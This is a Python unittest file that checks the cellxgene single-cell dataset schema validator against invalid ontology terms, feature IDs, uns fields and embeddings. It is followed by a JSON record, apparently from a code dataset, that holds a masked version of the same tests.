This MUST be an EFO term and either child of "EFO:0002772" or "EFO:0010183"
If there is not an exact match for the assay, clarifying text MAY be enclosed in parentheses and appended to
the most accurate term. For example, the sci-plex assay could be curated as "EFO:0010183 (sci-plex)"
"""
# Not a valid term
self.validator.adata.obs["assay_ontology_term_id"][0] = "CL:000001"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'CL:000001' in 'assay_ontology_term_id' is not a valid "
"ontology term id of 'EFO'.",
"ERROR: 'CL:000001' in 'assay_ontology_term_id' is not a child "
"term id of '[['EFO:0002772', 'EFO:0010183']]'.",
],
)
# Not a valid child
self.validator.adata.obs["assay_ontology_term_id"][0] = "EFO:0000001"
self.validator.errors = []
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'EFO:0000001' in 'assay_ontology_term_id' is not a "
"child term id of '[['EFO:0002772', 'EFO:0010183']]'."
],
)
# Not a clarifying text
self.validator.adata.obs["assay_ontology_term_id"][0] = "EFO:0010183 sci-plex"
self.validator.errors = []
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'EFO:0010183 sci-plex' in 'assay_ontology_term_id' is not a valid ontology term id of 'EFO'.",
"ERROR: 'EFO:0010183 sci-plex' in 'assay_ontology_term_id' is not a child term id of "
"'[['EFO:0002772', 'EFO:0010183']]'.",
],
)
def test_cell_type_ontology_term_id(self):
"""
cell_type_ontology_term_id categorical with str categories. This MUST be a CL term.
"""
# Not a valid term
self.validator.adata.obs["cell_type_ontology_term_id"][0] = "EFO:0000001"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'EFO:0000001' in 'cell_type_ontology_term_id' is not a valid "
"ontology term id of 'CL'."
],
)
def test_development_stage_ontology_term_id_human(self):
"""
development_stage_ontology_term_id categorical with str categories. If unavailable, this MUST be "unknown".
If organism_ontolology_term_id is "NCBITaxon:9606" for Homo sapiens,
this MUST be the most accurate HsapDv term.
"""
self.validator.adata.obs["organism_ontology_term_id"][0] = "NCBITaxon:9606"
self.validator.adata.obs["development_stage_ontology_term_id"][
0
] = "EFO:0000001"
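        # 'EFO:0000001' is not an HsapDv term, so it must be rejected for a human sample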
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'EFO:0000001' in 'development_stage_ontology_term_id' is "
"not a valid ontology term id of 'HsapDv'. When 'organism_ontology_term_id' is 'NCBITaxon:9606' "
"(Homo sapiens), 'development_stage_ontology_term_id' MUST be a term id of 'HsapDv' or unknown."
],
)
def test_development_stage_ontology_term_id_mouse(self):
"""
If organism_ontolology_term_id is "NCBITaxon:10090" for Mus musculus,
this MUST be the most accurate MmusDv term
"""
self.validator.adata.obs["organism_ontology_term_id"][0] = "NCBITaxon:10090"
self.validator.adata.obs["development_stage_ontology_term_id"][
0
] = "EFO:0000001"
self.validator.adata.obs["ethnicity_ontology_term_id"][0] = "na"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'EFO:0000001' in 'development_stage_ontology_term_id' is "
"not a valid ontology term id of 'MmusDv'. When 'organism_ontology_term_id' is 'NCBITaxon:10090' "
"(Mus musculus), 'development_stage_ontology_term_id' MUST be a term id of 'MmusDv' or unknown."
],
)
def test_development_stage_ontology_term_id_all_species(self):
"""
        For all other organisms, this MUST be a child of UBERON:0000105 and not UBERON:0000071
"""
# Fail case not an UBERON term
self.validator.adata.obs["organism_ontology_term_id"][0] = "NCBITaxon:10114"
self.validator.adata.obs["development_stage_ontology_term_id"][
0
] = "EFO:0000001"
self.validator.adata.obs["ethnicity_ontology_term_id"][0] = "na"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'EFO:0000001' in 'development_stage_ontology_term_id' is "
"not a valid ontology term id of 'UBERON'. When 'organism_ontology_term_id' is not 'NCBITaxon:10090' "
"nor 'NCBITaxon:9606', 'development_stage_ontology_term_id' MUST be a child term id of "
"'UBERON:0000105' excluding 'UBERON:0000071', or unknown.",
"ERROR: 'EFO:0000001' in 'development_stage_ontology_term_id' is not "
"a child term id of '[['UBERON:0000105']]'. When 'organism_ontology_term_id' is not 'NCBITaxon:10090' "
"nor 'NCBITaxon:9606', 'development_stage_ontology_term_id' MUST be a child term id of "
"'UBERON:0000105' excluding 'UBERON:0000071', or unknown.",
],
)
        # For all other organisms, this MUST be a child of UBERON:0000105 and not UBERON:0000071
# Fail case UBERON:0000071
self.validator.errors = []
self.validator.adata.obs["organism_ontology_term_id"][0] = "NCBITaxon:10114"
self.validator.adata.obs["development_stage_ontology_term_id"][
0
] = "UBERON:0000071"
self.validator.adata.obs["ethnicity_ontology_term_id"][0] = "na"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'UBERON:0000071' in 'development_stage_ontology_term_id' is not allowed'. When "
"'organism_ontology_term_id' is not 'NCBITaxon:10090' "
"nor 'NCBITaxon:9606', 'development_stage_ontology_term_id' MUST be a child term id of "
"'UBERON:0000105' excluding 'UBERON:0000071', or unknown.",
],
)
def test_disease_ontology_term_id(self):
"""
disease_ontology_term_id categorical with str categories. This MUST be a MONDO term or
PATO:0000461 for normal or healthy.
"""
# Invalid ontology
self.validator.adata.obs["disease_ontology_term_id"][0] = "EFO:0000001"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'EFO:0000001' in 'disease_ontology_term_id' is not a "
"valid ontology term id of 'MONDO, PATO'. Only 'PATO:0000461' is allowed for 'PATO' term ids."
],
)
# Invalid PATO term id
self.validator.errors = []
self.validator.adata.obs["disease_ontology_term_id"][0] = "PATO:0001894"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'PATO:0001894' in 'disease_ontology_term_id' is not an allowed term: '[['PATO:0000461']]'. "
"Only 'PATO:0000461' is allowed for 'PATO' term ids."
],
)
def test_ethnicity_ontology_term_id(self):
"""
ethnicity_ontology_term_id categorical with str categories.
If organism_ontolology_term_id is "NCBITaxon:9606" for Homo sapiens,
this MUST be either a HANCESTRO term or "unknown" if unavailable.
Otherwise, for all other organisms this MUST be "na".
"""
# If organism_ontolology_term_id is "NCBITaxon:9606" for Homo sapiens,
# this MUST be either a HANCESTRO term or "unknown" if unavailable.
self.validator.adata.obs["organism_ontology_term_id"][0] = "NCBITaxon:9606"
self.validator.adata.obs["ethnicity_ontology_term_id"][0] = "EFO:0000001"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'EFO:0000001' in 'ethnicity_ontology_term_id' is "
"not a valid ontology term id of 'HANCESTRO'. When 'organism_ontology_term_id' is 'NCBITaxon:9606' "
"(Homo sapiens), ethnicity_ontology_term_id MUST be a term id of 'HANCESTRO' or 'unknown'."
],
)
# Otherwise, for all other organisms this MUST be "na". Below is the test case for mouse data.
# development_stage_ontology_term_id has to be set to an appropriate mouse term id, otherwise there
# will be an error in that field.
self.validator.errors = []
self.validator.adata.obs["organism_ontology_term_id"][0] = "NCBITaxon:10090"
self.validator.adata.obs["development_stage_ontology_term_id"][
0
] = "MmusDv:0000003"
self.validator.adata.obs["ethnicity_ontology_term_id"][0] = "EFO:0000001"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'EFO:0000001' in 'ethnicity_ontology_term_id' is not a "
"valid value of 'ethnicity_ontology_term_id'. When 'organism_ontology_term_id' is NOT 'NCBITaxon:9606' "
"(Homo sapiens), ethnicity_ontology_term_id MUST be 'na'."
],
)
def test_organism_ontology_term_id(self):
"""
organism_ontology_term_id categorical with str categories. This MUST be a child of NCBITaxon:33208.
"""
# Setting "organism_ontology_term_id" to "EFO:0000001" is the fail case. However since this represents neither
# human nor mouse, then two other columns that are dependent on it need to be set appropriately to avoid
# other error messages: "development_stage_ontology_term_id" and "ethnicity_ontology_term_id"
self.validator.adata.obs["organism_ontology_term_id"][0] = "EFO:0000001"
self.validator.adata.obs["development_stage_ontology_term_id"][0] = "unknown"
self.validator.adata.obs["ethnicity_ontology_term_id"][0] = "na"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'EFO:0000001' in 'organism_ontology_term_id' is not a valid "
"ontology term id of 'NCBITaxon'. Only children term ids of 'NCBITaxon:33208' for metazoan are allowed."
],
)
def test_tissue_ontology_term_id_base(self):
"""
tissue_ontology_term_id categorical with str categories. This MUST be the term that best describes the tissue
that this cell was derived from, depending on the type of biological sample:
"""
self.validator.adata.obs["tissue_ontology_term_id"][0] = "EFO:0000001"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'EFO:0000001' in 'tissue_ontology_term_id' is not a "
"valid ontology term id of 'UBERON, CL'."
],
)
def test_tissue_ontology_term_id_cell_culture(self):
"""
Cell Culture - MUST be a CL term appended with " (cell culture)"
"""
self.validator.adata.obs["tissue_ontology_term_id"][
0
] = "CL:0000057 (CELL culture)"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'CL:0000057 (CELL culture)' in 'tissue_ontology_term_id' is "
"not a valid ontology term id of 'UBERON, CL'."
],
)
def test_tissue_ontology_term_id_organoid(self):
"""
Organoid - MUST be an UBERON term appended with " (organoid)"
"""
self.validator.adata.obs["tissue_ontology_term_id"][0] = "CL:0000057 (ORGANOID)"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'CL:0000057 (ORGANOID)' in 'tissue_ontology_term_id' is "
"not a valid ontology term id of 'UBERON, CL'."
],
)
def test_sex_ontology_term_id(self):
"""
sex_ontology_term_id categorical with str categories.
        This MUST be a child of PATO:0001894 for phenotypic sex or "unknown" if unavailable
"""
self.validator.adata.obs["sex_ontology_term_id"][0] = "EFO:0000001"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'EFO:0000001' in 'sex_ontology_term_id' is "
"not a valid ontology term id of 'PATO'. Only 'PATO:0000383', 'PATO:0000384', 'PATO:0001340', "
"or 'unknown' are allowed."
],
)
def test_is_primary_data(self):
"""
is_primary_data bool. This MUST be True if this is the canonical instance of this cellular
observation and False if not. This is commonly False
for meta-analyses reusing data or for secondary views of data.
"""
self.validator.adata.obs["is_primary_data"] = "FALSE"
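        # The column is now 'object' dtype instead of bool, which must fail validation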
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: Column 'is_primary_data' in dataframe 'obs' "
"must be boolean, not 'object'."
],
)
class TestVar(unittest.TestCase):
"""
Fail cases in adata.var and adata.raw.var
"""
def setUp(self):
self.validator = Validator()
self.validator.adata = examples.adata.copy()
def test_var_and_raw_var_same_index(self):
"""
var.index MUST contain unique identifiers for features. raw.var.index MUST be identical to var.index.
"""
# Swap first row for second one
var = Validator.getattr_anndata(self.validator.adata, "var")
# First swap the index
new_index = list(var.index)
tmp = new_index[0]
new_index[0] = new_index[1]
new_index[1] = tmp
var.set_index(pd.Index(new_index), inplace=True)
# Then swap the actual rows
tmp = var.iloc[0, :].copy()
var.iloc[0, :] = var.iloc[1, :].copy()
var.iloc[1, :] = tmp
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
["ERROR: Index of 'raw.var' is not identical to index of 'var'."],
)
def test_check_unique_var(self):
"""
var.index MUST contain unique ENSEMBL gene identifiers for features.
"""
for component_name in ["var", "raw.var"]:
with self.subTest(component_name=component_name):
# Resetting validator
self.validator.adata = examples.adata.copy()
self.validator.errors = []
# Duplicate 1st row in var and assign it to 2nd
component = Validator.getattr_anndata(
self.validator.adata, component_name
)
new_index = list(component.index)
new_index[1] = new_index[0]
component.set_index(pd.Index(new_index), inplace=True)
component.iloc[1, :] = component.iloc[0, :]
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
f"ERROR: Column 'index' in dataframe '{component_name}' is not unique."
],
)
def test_column_presence(self):
"""
        var is a pandas.DataFrame. Curators MUST annotate the following columns in the var dataframe.
feature_is_filtered must not be in raw.var, and it's only checked in var
"""
columns = ["feature_is_filtered", "feature_biotype"]
for component_name in ["var", "raw.var"]:
for column in columns:
if column == "feature_is_filtered" and component_name == "raw.var":
continue
with self.subTest(component_name=component_name, column=column):
# Resetting validator
self.validator.errors = []
self.validator.adata = examples.adata.copy()
component = Validator.getattr_anndata(
self.validator.adata, component_name
)
component.drop(column, axis=1, inplace=True)
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
f"ERROR: Dataframe '{component_name}' is missing "
f"column '{column}'."
],
)
def test_feature_is_filtered(self):
"""
feature_is_filtered bool. This MUST be True if the feature was filtered out in the final matrix (X)
but is present in the raw matrix (raw.X). The value for all cells of the given feature in the
final matrix MUST be 0.
Otherwise, this MUST be False.
"""
        # Flag the first feature as filtered, then leave a single non-zero value in its column of X
self.validator.adata.var["feature_is_filtered"][0] = True
for i in range(self.validator.adata.X.shape[0]):
self.validator.adata.X[i, 0] = 0
self.validator.adata.X[0, 0] = 1
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: Some features are 'True' in 'feature_is_filtered' of dataframe 'var', "
"but there are 1 non-zero values in the corresponding columns of the matrix 'X'. "
"All values for these features must be 0."
],
)
def test_columns_not_in_raw_var(self):
"""
Curators MUST annotate the following column only in the var dataframe.
This column MUST NOT be present in raw.var:
feature_is_filtered
"""
self.validator.adata.raw = self.validator.adata
self.validator.adata.uns["X_normalization"] = "CPM"
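        # Copying adata into raw carries over 'feature_is_filtered', which is not allowed in raw.var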
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
["ERROR: Column 'feature_is_filtered' must not be present in 'raw.var'."],
)
def test_feature_id_wrong_format(self):
"""
feature_id (var.index) str.
If the feature_biotype is "gene" then this MUST be an ENSEMBL term.
If the feature_biotype is "spike-in" then this MUST be an ERCC Spike-In identifier.
This tests the case of an ID with an incorrect format "ENSEBML_NOGENE"
"""
for component_name in ["var", "raw.var"]:
with self.subTest(component_name=component_name):
# Resetting validator
self.validator.adata = examples.adata.copy()
self.validator.errors = []
component = Validator.getattr_anndata(
self.validator.adata, component_name
)
new_index = list(component.index)
new_index[0] = "ENSEBML_NOGENE"
component.set_index(pd.Index(new_index), inplace=True)
component["feature_biotype"][0] = "gene"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
f"ERROR: Could not infer organism from feature ID 'ENSEBML_NOGENE' "
f"in '{component_name}', make sure it is a valid ID."
],
)
def test_feature_id_non_existent_ensembl(self):
"""
feature_id (var.index) str.
If the feature_biotype is "gene" then this MUST be an ENSEMBL term.
If the feature_biotype is "spike-in" then this MUST be an ERCC Spike-In identifier.
This tests the case of an ENSEMBL ID that has the right format but doesn't exist
"""
for component_name in ["var", "raw.var"]:
with self.subTest(component_name=component_name):
# Resetting validator
self.validator.adata = examples.adata.copy()
self.validator.errors = []
component = Validator.getattr_anndata(
self.validator.adata, component_name
)
new_index = list(component.index)
new_index[0] = "ENSG000"
component.set_index(pd.Index(new_index), inplace=True)
component["feature_biotype"][0] = "gene"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
f"ERROR: 'ENSG000' is not a valid feature ID in '{component_name}'."
],
)
def test_feature_id_non_existent_ercc(self):
"""
feature_id (var.index) str.
If the feature_biotype is "gene" then this MUST be an ENSEMBL term.
If the feature_biotype is "spike-in" then this MUST be an ERCC Spike-In identifier.
This tests the case of an ERCC ID that has the right format but doesn't exist
"""
for component_name in ["var", "raw.var"]:
with self.subTest(component_name=component_name):
# Resetting validator
self.validator.adata = examples.adata.copy()
self.validator.errors = []
component = Validator.getattr_anndata(
self.validator.adata, component_name
)
new_index = list(component.index)
new_index[0] = "ERCC-000000"
component.set_index(pd.Index(new_index), inplace=True)
component["feature_biotype"][0] = "spike-in"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
f"ERROR: 'ERCC-000000' is not a valid feature ID in '{component_name}'."
],
)
class TestUns(unittest.TestCase):
"""
Fail cases in adata.uns
"""
def setUp(self):
self.validator = Validator()
self.validator.adata = examples.adata.copy()
def test_required_fields_schema_version(self):
"""
Curators MUST annotate `schema_version` and values in uns (schema_version)
"""
del self.validator.adata.uns["schema_version"]
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: adata has no schema definition in 'adata.uns'. "
"Validation cannot be performed."
],
)
def test_required_fields_title(self):
"""
Curators MUST annotate `schema_version` and values in uns (title)
"""
del self.validator.adata.uns["title"]
self.validator.validate_adata()
self.assertEqual(
self.validator.errors, ["ERROR: 'title' in 'uns' is not present."]
)
def test_required_fields_X_normalization(self):
"""
Curators MUST annotate `schema_version` and values in uns (X_normalization)
"""
del self.validator.adata.uns["X_normalization"]
self.validator.validate_adata()
self.assertEqual(
self.validator.errors, ["ERROR: 'X_normalization' in 'uns' is not present."]
)
def test_leading_trailing_double_spaces_in_strings(self):
"""
The following sequences MUST NOT appear in str types documented in the schema:
Leading control or space separators - ” This is an example”
Trailing control or space separators - “This is an example ”
            Multiple (internal) control or space separators - "This  is an example"
"""
self.validator.adata.uns["title"] = " There is a leading space"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: ' There is a leading space' in 'uns['title']' is not valid, it contains leading spaces."
],
)
self.validator.adata.uns["title"] = "There is a trailing space "
self.validator.errors = []
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'There is a trailing space ' in 'uns['title']' is not valid, it contains trailing spaces."
],
)
        self.validator.adata.uns["title"] = "There are  double spaces"
self.validator.errors = []
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
            [
                "ERROR: 'There are  double spaces' in 'uns['title']' is not valid, it contains double spaces."
            ],
)
def test_schema_version(self):
"""
Schema_version, This MUST be "2.0.0".
"""
self.validator.adata.uns["schema_version"] = "1.0.0"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: Schema version '1.0.0' is not supported. Current supported versions: '['2.0.0']'. "
"Validation cannot be performed."
],
)
def test_title(self):
"""
Title MUST be a string
"""
# list instead of string
self.validator.adata.uns["title"] = ["title"]
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: '['title']' in 'uns['title']' is not valid, "
"it must be a string."
],
)
def test_X_normalization_is_str(self):
"""
X_normalization str.
"""
# list instead of string
self.validator.adata.uns["X_normalization"] = ["normalization"]
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: '['normalization']' in 'uns['X_normalization']' is "
"not valid, it must be a string."
],
)
def test_X_normalization_not_raw(self):
"""
X_normalization str. This SHOULD describe the method used to normalize the data stored in AnnData X.
If data in X are raw, this SHOULD be "none".
FAIL CASE for when X_normalization was set to "none" but X may not be raw data
"""
        # Delete raw and declare X as raw ('none') even though X holds normalized (non-integer) values
del self.validator.adata.raw
self.validator.adata.uns["X_normalization"] = "none"
self.validator.validate_adata()
self.assertEqual(
self.validator.warnings,
[
"WARNING: uns['X_normalization'] is 'none', there is no 'raw.X' and 'X' doesn't appear "
"to have raw counts (integers)"
],
)
def test_batch_condition_is_list(self):
"""
batch_condition list[str]
"""
# Check valid case of numpy array which is interchangeable with lists
self.validator.adata.uns["batch_condition"] = numpy.array(
self.validator.adata.uns["batch_condition"]
)
self.validator.validate_adata()
self.assertEqual(self.validator.errors, [])
# Check fail case: not a list nor numpy array
self.validator.adata.uns["batch_condition"] = "cell_type_ontology_term_id"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'cell_type_ontology_term_id' in 'uns['batch_condition']' "
"is not valid, it must be a list or numpy array."
],
)
def test_batch_condition_is_column_from_obs(self):
"""
batch_condition list[str]. str values MUST refer to cell metadata keys in obs.
"""
self.validator.adata.uns["batch_condition"] = ["NO_COLUMN"]
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: Value 'NO_COLUMN' of list 'batch_condition' is not a "
"column in 'adata.obs'."
],
)
def test_default_embedding_is_str(self):
"""
Default_embedding str.
"""
self.validator.adata.uns["default_embedding"] = ["X_umap"]
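        # A list is not a valid value; 'default_embedding' must be a string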
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: '['X_umap']' in 'uns['default_embedding']' is not valid, "
"it must be a string."
],
)
def test_default_embedding_is_key_from_obsm(self):
"""
Default_embedding str. The value MUST match a key to an embedding in obsm
"""
self.validator.adata.uns["default_embedding"] = "X_other"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'X_other' in 'uns['default_embedding']' is not valid, "
"it must be a key of 'adata.obsm'."
],
)
def test_X_approximate_distribution_is_str(self):
"""
X_approximate_distribution str. The value MUST be "count" [...] or "normal".
Note that `normal` is tested in the happy path test case using `good_uns`.
"""
# Check valid case of "count" which is not included in valid object
self.validator.adata.uns["X_approximate_distribution"] = "count"
self.validator.validate_adata()
self.assertEqual(self.validator.errors, [])
# Invalid type: list
self.validator.adata.uns["X_approximate_distribution"] = ["count"]
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: '['count']' in 'uns['X_approximate_distribution']' "
"is not valid, it must be a string."
],
)
def test_X_approximate_distribution_is_valid(self):
"""
X_approximate_distribution str. The value MUST be "count" [...] or "normal"
"""
self.validator.adata.uns["X_approximate_distribution"] = "COUNT"
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: 'COUNT' in 'uns['X_approximate_distribution']' is "
"not valid. Allowed terms: ['count', 'normal']."
],
)
class TestObsm(unittest.TestCase):
"""
Fail cases for adata.obsm
"""
def setUp(self):
self.validator = Validator()
self.validator.adata = examples.adata.copy()
    def test_obsm_values_are_numpy(self):
"""
values in obsm MUST be a numpy.ndarray
"""
self.validator.adata.obsm["X_tsne"] = pd.DataFrame(
self.validator.adata.obsm["X_umap"], index=self.validator.adata.obs_names
)
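        # X_tsne is now a pandas DataFrame, which is not allowed for embeddings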
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: All embeddings have to be of 'numpy.ndarray' type, "
"'adata.obsm['X_tsne']' is <class 'pandas.core.frame.DataFrame'>')."
],
)
def test_obsm_values_at_least_one_X(self):
"""
At least one key for the embedding MUST be prefixed with "X_"
"""
self.validator.adata.obsm["umap"] = self.validator.adata.obsm["X_umap"]
self.validator.adata.uns["default_embedding"] = "umap"
del self.validator.adata.obsm["X_umap"]
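        # No remaining obsm key has the 'X_' prefix, which must raise an error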
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: At least one embedding in 'obsm' has to have a "
"key with an 'X_' prefix."
],
)
def test_obsm_shape(self):
"""
Curators MUST annotate one or more two-dimensional (m >= 2) embeddings
"""
# Makes 1 column array
self.validator.adata.obsm["X_umap"] = numpy.delete(
self.validator.adata.obsm["X_umap"], 0, 1
)
self.validator.validate_adata()
self.assertEqual(
self.validator.errors,
[
"ERROR: All embeddings must have as many rows as cells, and "
"at least two columns.'adata.obsm['X_umap']' has shape "
"of '(2, 1)'."
],
)
class TestAddingLabels(unittest.TestCase):
"""
Tests the addition of labels from IDs based on schema specification. The test is done by comparing manually
created dataframes (positive control) against the ones produced by the validator
"""
@classmethod
def setUpClass(cls):
# Manually created data (positive control)
cls.adata_with_labels = examples.adata_with_labels
# Validate test data
validator = Validator()
validator.adata = examples.adata.copy()
validator.validate_adata()
# Add labels through validator
cls.label_writer = AnnDataLabelAppender(validator)
cls.label_writer._add_labels()
def test_var_added_labels(self):
"""
When a dataset is uploaded, cellxgene Data Portal MUST automatically add the matching human-readable
name for the corresponding feature identifier and the inferred NCBITaxon term for the reference organism
to the var dataframe. Curators MUST NOT annotate the following columns:
- feature_name. If the feature_biotype is "gene" then this MUST be the human-readable ENSEMBL gene
name assigned to the feature_id. If the feature_biotype is "spike-in" then this MUST be the
ERCC Spike-In identifier appended with " spike-in control".
- feature_reference. This MUST be the reference organism for a feature:
Homo sapiens "NCBITaxon:9606"
Mus musculus "NCBITaxon:10090"
SARS-CoV-2 "NCBITaxon:2697049"
ERCC Spike-Ins "NCBITaxon:32630"
"""
for column in ["feature_name", "feature_reference"]:
expected_column = self.adata_with_labels.var[column]
obtained_column = self.label_writer.adata.var[column]
for i, j in zip(expected_column.tolist(), obtained_column.tolist()):
with self.subTest(i=i, j=j):
self.assertEqual(i, j)
def test_obs_added_labels(self):
"""
When a dataset is uploaded, the cellxgene Data Portal MUST automatically add the matching human-readable
name for the corresponding ontology term to the obs dataframe.
Curators MUST NOT annotate the following columns.
- assay. categorical with str categories. This MUST be the human-readable name assigned to the value
of assay_ontology_term_id. Any clarifying text enclosed in parentheses and appended to
assay_ontology_term_id MUST be appended to assay.
- cell_type. categorical with str categories. This MUST be the human-readable name assigned to the value
of cell_type_ontology_term_id.
- development_stage. categorical with str categories. This MUST be "unknown" if set in
development_stage_ontology_term_id; otherwise, this MUST be the human-readable name assigned to
the value of development_stage_ontology_term_id.
- disease. categorical with str categories. This MUST be the human-readable name assigned to
the value of disease_ontology_term_id.
- ethnicity. categorical with str categories. This MUST be "na" or "unknown" if
set in ethnicity_ontology_term_id; otherwise, this MUST be the human-readable
name assigned to the value of ethnicity_ontology_term_id.
- organism. categorical with str categories. This MUST be the human-readable name assigned
to the value of organism_ontology_term_id.
- sex. categorical with str categories. This MUST be "unknown" if set in sex_ontology_term_id;
otherwise, this MUST be the human-readable name assigned to the value of sex_ontology_term_id.
- tissue. categorical with str categories. This MUST be the human-readable name assigned to the
value of tissue_ontology_term_id. " (cell culture)" or " (organoid)" MUST
be appended if present in tissue_ontology_term_id.
"""
for column in [
"assay",
"cell_type",
"development_stage",
"disease",
"ethnicity",
"organism",
"sex",
"tissue",
]:
expected_column = self.adata_with_labels.obs[column]
obtained_column = self.label_writer.adata.obs[column]
for i, j in zip(expected_column.tolist(), obtained_column.tolist()):
with self.subTest(i=i, j=j):
self.assertEqual(i, j)
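

def _example_expected_obs_labels():
    """
    Illustrative sketch with assumed term-to-label mappings, not used by the
    assertions above: a few ontology term ids and the human-readable labels
    the portal is expected to attach under the rules quoted in
    test_obs_added_labels.
    """
    return {
        "NCBITaxon:9606": "Homo sapiens",   # organism
        "NCBITaxon:10090": "Mus musculus",  # organism
        "PATO:0000461": "normal",           # disease
        "PATO:0000383": "female",           # sex (assumed mapping)
    }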
|
normal
|
{
"blob_id": "f4306f80330850415b74d729384f360489644e39",
"index": 354,
"step-1": "<mask token>\n\n\nclass TestObs(unittest.TestCase):\n <mask token>\n\n def setUp(self):\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def test_development_stage_ontology_term_id_mouse(self):\n \"\"\"\n If organism_ontolology_term_id is \"NCBITaxon:10090\" for Mus musculus,\n this MUST be the most accurate MmusDv term\n \"\"\"\n self.validator.adata.obs['organism_ontology_term_id'][0\n ] = 'NCBITaxon:10090'\n self.validator.adata.obs['development_stage_ontology_term_id'][0\n ] = 'EFO:0000001'\n self.validator.adata.obs['ethnicity_ontology_term_id'][0] = 'na'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'development_stage_ontology_term_id' is not a valid ontology term id of 'MmusDv'. When 'organism_ontology_term_id' is 'NCBITaxon:10090' (Mus musculus), 'development_stage_ontology_term_id' MUST be a term id of 'MmusDv' or unknown.\"\n ])\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def test_sex_ontology_term_id(self):\n \"\"\"\n sex_ontology_term_id categorical with str categories.\n This MUST be a child of PATOPATO:0001894 for phenotypic sex or \"unknown\" if unavailable\n \"\"\"\n self.validator.adata.obs['sex_ontology_term_id'][0] = 'EFO:0000001'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'sex_ontology_term_id' is not a valid ontology term id of 'PATO'. Only 'PATO:0000383', 'PATO:0000384', 'PATO:0001340', or 'unknown' are allowed.\"\n ])\n <mask token>\n\n\nclass TestVar(unittest.TestCase):\n \"\"\"\n Fail cases in adata.var and adata.raw.var\n \"\"\"\n\n def setUp(self):\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n\n def test_var_and_raw_var_same_index(self):\n \"\"\"\n var.index MUST contain unique identifiers for features. raw.var.index MUST be identical to var.index.\n \"\"\"\n var = Validator.getattr_anndata(self.validator.adata, 'var')\n new_index = list(var.index)\n tmp = new_index[0]\n new_index[0] = new_index[1]\n new_index[1] = tmp\n var.set_index(pd.Index(new_index), inplace=True)\n tmp = var.iloc[0, :].copy()\n var.iloc[0, :] = var.iloc[1, :].copy()\n var.iloc[1, :] = tmp\n self.validator.validate_adata()\n print('FOO', self.validator.errors)\n self.assertEqual(self.validator.errors, [\n \"ERROR: Index of 'raw.var' is not identical to index of 'var'.\"])\n\n def test_check_unique_var(self):\n \"\"\"\n var.index MUST contain unique ENSEMBL gene identifiers for features.\n \"\"\"\n for component_name in ['var', 'raw.var']:\n with self.subTest(component_name=component_name):\n self.validator.adata = examples.adata.copy()\n self.validator.errors = []\n component = Validator.getattr_anndata(self.validator.adata,\n component_name)\n new_index = list(component.index)\n new_index[1] = new_index[0]\n component.set_index(pd.Index(new_index), inplace=True)\n component.iloc[1, :] = component.iloc[0, :]\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: Column 'index' in dataframe '{component_name}' is not unique.\"\n ])\n\n def test_column_presence(self):\n \"\"\"\n var is a pandas.DataFrame. 
